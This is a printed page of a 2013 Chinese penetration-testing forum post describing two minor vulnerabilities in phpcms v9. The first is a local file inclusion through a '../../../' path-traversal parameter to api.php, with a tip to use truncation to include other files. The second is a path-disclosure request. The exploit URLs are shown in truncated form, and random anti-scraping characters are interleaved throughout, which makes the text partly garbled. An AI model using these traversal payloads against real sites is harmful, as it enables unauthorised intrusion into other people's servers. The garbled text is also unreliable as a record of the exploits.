中国网络渗透测试联盟

标题: phpcms v9两个鸡肋漏洞 [打印本页]

作者: admin    时间: 2013-4-4 17:28
标题: phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
9 u# Z5 a+ f. `3 L+ \$ g/ B1 y6 ^* o9 d/ X( e; C/ {  e9 l
Exp: http://www.php0day.com/api.php?o ... efile=../../../fuck
, j. b. _, ]  S
! O$ b" C* z* |- C#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
5 T3 K* O3 z: s6 e$ |8 K& E
$ T7 s6 L: t5 a, i( i, QExp: http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy+ D1 v( ~6 T2 ?* a9 u
7 U. z( K7 Q( ?$ q6 Y
#暴路径7 g$ D: H) m" K1 |1 M; P

$ }6 r( W6 k" b0 r( V* T+ }注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
& l( p$ H4 I8 K) q3 ?( V
! }7 {$ `0 S6 C: A; h4 d+ b, q& @2 [- n: q& P
, r/ _. j3 p7 G3 V& l9 t
+1




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2